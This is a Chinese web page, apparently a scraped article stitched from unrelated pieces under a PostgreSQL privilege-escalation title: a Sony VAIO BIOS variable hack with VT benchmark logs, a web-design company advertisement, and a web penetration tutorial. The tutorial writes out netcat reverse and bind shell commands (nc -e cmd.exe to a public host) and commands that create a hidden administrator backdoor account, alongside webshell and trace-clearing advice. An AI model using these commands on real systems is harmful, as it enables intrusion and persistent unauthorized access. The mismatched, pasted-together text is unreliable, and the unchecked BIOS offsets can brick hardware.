postgresql提权的简单介绍
索尼笔记本 VAIO NW系列BIOS里 Intel VTX在哪里?
下载这个 EFI程序,或者是下载该帖的附件解压,(MD5: 02C3E0E4CFBE8266D045BD3DF62D0135)将这个 BOOTX64.EFI 复制到用FAT32格式化的U盘的\EFI\BOOT\目录内,用U盘启动电脑(只要插着U盘电脑就会从U盘启动了,无需BIOS设置),将看到如下显示:
成都创新互联公司企业建站,十余年网站建设经验,专注于网站建设技术,精于网页设计,有多年建站和网站代运营经验,设计师为客户打造网络企业风格,提供周到的建站售前咨询和贴心的售后服务。对于成都做网站、网站设计、外贸营销网站建设中不同领域进行深入了解和探索,创新互联在网站建设中充分了解客户行业的需求,以灵动的思维在网页中充分展现,通过对客户行业精准市场调研,为客户提供的解决方案。
引用:
Welcome to GRUB!
Entering rescue mode...
error: file not found
grub rescue
输入命令
setup_var 0x1af 0x1
回车,重启电脑,VT应该就被打开了。(以上命令的圈圈都是数字零)
警告!风险自担!千万不要输错命令了!偏移量一定要正确!改错了偏移量将可能导致无法开机需要送修客服!(切断CMOS电池都没用)
目前已确认该方法能在以下版本的BIOS工作:
Sony VGN-Z11, V: M3a R2168M3 05/20/2009
Sony VGN-Z36GD, V: R3054M3
Sony VGN-Z540, V: R2168M3
Sony VGN-Z31, V: M3b R3054M3 05/19/2009
Sony VGN-Z21, V: M3a R2168M3
Sony VGN-Z31, V: R3052M3
如何开启BIOS高级设置菜单
只需要更改另一个偏移量的变量值即可,输入命令:
setup_var 0x25a 0x1
重启
这样就可以直接在BIOS里面随时控制开启关闭VT了,当然还包括其他一系列高级的东西比如AHCI、TXT之类的~大家慢慢玩去吧~装XP、Server 03的玩家们有福了!貌似不用集成SATA驱动了,轻松降级XP!
确认是否成功启动了VT的标准:是否能成功启动64位虚拟机,或者是否能使用Windows 7的XP模式
OK,现在是时候来测试一下到底 VT 对 32 位系统有没有性能上的影响了。
理论上来说,硬件虚拟(VT-x)相对于软件模拟(Binary Translation)的性能提升在于虚拟内核态运行的代码,也就是说提权到0环的时候影响最大。(什么是Kernel time?Windows用户开启任务管理器,性能-显示-显示内核时间,红线就是内核占用的CPU了。)为了验证这一点,笔者进行了以下测试:
测试平台:
VMWare 6.5.2
Host OS: Windows Server 2008 Enterprise SP2 32-bit
Guest OS:Ubuntu 6.06 32-bit
测试项目:
1、编译 PostgreSQL 的源代码
2、用 Firefox 2.0 运行 Peacekeeper 测试浏览器性能
为了保证数据的一致性,所有测试项均运行了两次,保证没有太大的差异。
结果:
VT disabled in bios, force "Binary Translation":
Jul 21 20:16:53.208: vmx| HV Settings: virtual exec = 'software'; virtual mmu = 'software'
Compile PostgreSQL:
real 3m54.795s
user 2m46.506s
sys 0m54.479s
real 3m50.576s
user 2m45.050s
sys 0m52.091s
Peacekeeper:
358
342
VT enabled in bios, force "VT-X":
Jul 21 20:42:53.937: vmx| HV Settings: virtual exec = 'hardware'; virtual mmu = 'software'
Compile PostgreSQL:
real 2m51.950s
user 2m11.012s
sys 0m29.426s
real 2m49.712s
user 2m11.464s
sys 0m27.054s
Peacekeeper:
362
384
可以看出,开启 VT 对于内核态的运算性能有很明显的提升,大概快 100%!不过开启 VT 对于用户态的运算就没有那么大的提升了,所以 Peacekeeper 的分数差别不大,编译过程中用户态消耗的时间差别也不大。
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
分享名称:postgresql提权的简单介绍
当前地址:http://pwwzsj.com/article/dsdpdss.html